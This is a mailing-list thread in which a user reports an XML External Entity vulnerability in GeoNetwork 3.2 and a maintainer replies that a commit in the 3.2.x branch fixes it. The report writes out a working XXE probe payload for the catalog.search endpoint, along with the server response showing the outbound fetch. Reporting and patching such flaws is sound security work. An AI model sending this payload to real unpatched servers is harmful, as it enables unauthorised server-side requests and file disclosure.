Geonetwork XEE Vulnerability question

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
2 messages Options
Reply | Threaded
Open this post in threaded view
|

Geonetwork XEE Vulnerability question

Mariano Valderrey
Hi,

My name es Mariano Valderrey, and I have scanned my GeoNetwork with
Accunetix and found XML External Entity Injection vulnerability.  I
found that en GeoServer you have fixed the problem and maybe I can use
the solution for GeoNetwork 3.2.
I wonder if you can help me with this.

Here is what I found:

https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing

**************

To confirm this I send a specific request with this XML to the URL
/geonetwork/srv/eng/catalog.search

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
   <!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>

And I received this result:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre>    Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
9.3.11.v20160721</a><hr/>

</body>
</html>

******************

The package capture from the server I can see that send a request to
http://google.com and I found in the result that the server was
redirected to www.google.com.ar. This confirm the vulnerability.

Sorry for my english,

Greetings and thank you so much.


--
Ing. en Sistemas Mariano Valderrey
Tel. (+54 11) 4331 0074 int. 5727
Unidad Base de Datos y Comunicaciones
Gerencia de Gestión Tecnológica
CONAE

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
GeoNetwork-usuarios-es mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es
Reply | Threaded
Open this post in threaded view
|

Re: Geonetwork XEE Vulnerability question

Jose Garcia
Hola Mariano

Este issue está resuelto en el branch 3.2.x:
https://github.com/geonetwork/core-geonetwork/commit/8bb55373d0c79fd17bfa40e725cf255c9a019145
y lo incorporará la versión 3.2.1

Saludos,
Jose García

On Wed, Dec 28, 2016 at 6:30 PM, Mariano Valderrey <[hidden email]>
wrote:

> Hi,
>
> My name es Mariano Valderrey, and I have scanned my GeoNetwork with
> Accunetix and found XML External Entity Injection vulnerability.  I
> found that en GeoServer you have fixed the problem and maybe I can use
> the solution for GeoNetwork 3.2.
> I wonder if you can help me with this.
>
> Here is what I found:
>
> https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
>
> **************
>
> To confirm this I send a specific request with this XML to the URL
> /geonetwork/srv/eng/catalog.search
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE request [
>    <!ENTITY include SYSTEM "http://google.com">
> ]>
> <catalog.search>&include;</catalog.search>
>
> And I received this result:
>
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
> <title>Error 400 Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </title>
> </head>
> <body><h2>HTTP ERROR 400</h2>
> <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
> <pre>    Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
> 9.3.11.v20160721</a><hr/>
>
> </body>
> </html>
>
> ******************
>
> The package capture from the server I can see that send a request to
> http://google.com and I found in the result that the server was
> redirected to www.google.com.ar. This confirm the vulnerability.
>
> Sorry for my english,
>
> Greetings and thank you so much.
>
>
> --
> Ing. en Sistemas Mariano Valderrey
> Tel. (+54 11) 4331 0074 int. 5727
> Unidad Base de Datos y Comunicaciones
> Gerencia de Gestión Tecnológica
> CONAE
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> GeoNetwork-usuarios-es mailing list
> [hidden email]
> https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es
>



--













*Vriendelijke groeten / Kind regards,Jose García
<http://www.geocat.net/>Veenderweg 136721 WD BennekomThe NetherlandsT: +31
(0)318 416664 <+31318416664> <https://www.facebook.com/geocatbv>
<https://twitter.com/geocat_bv>
<https://plus.google.com/u/1/+GeocatNetbv/posts>Please consider the
environment before printing this email.*
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
GeoNetwork-usuarios-es mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es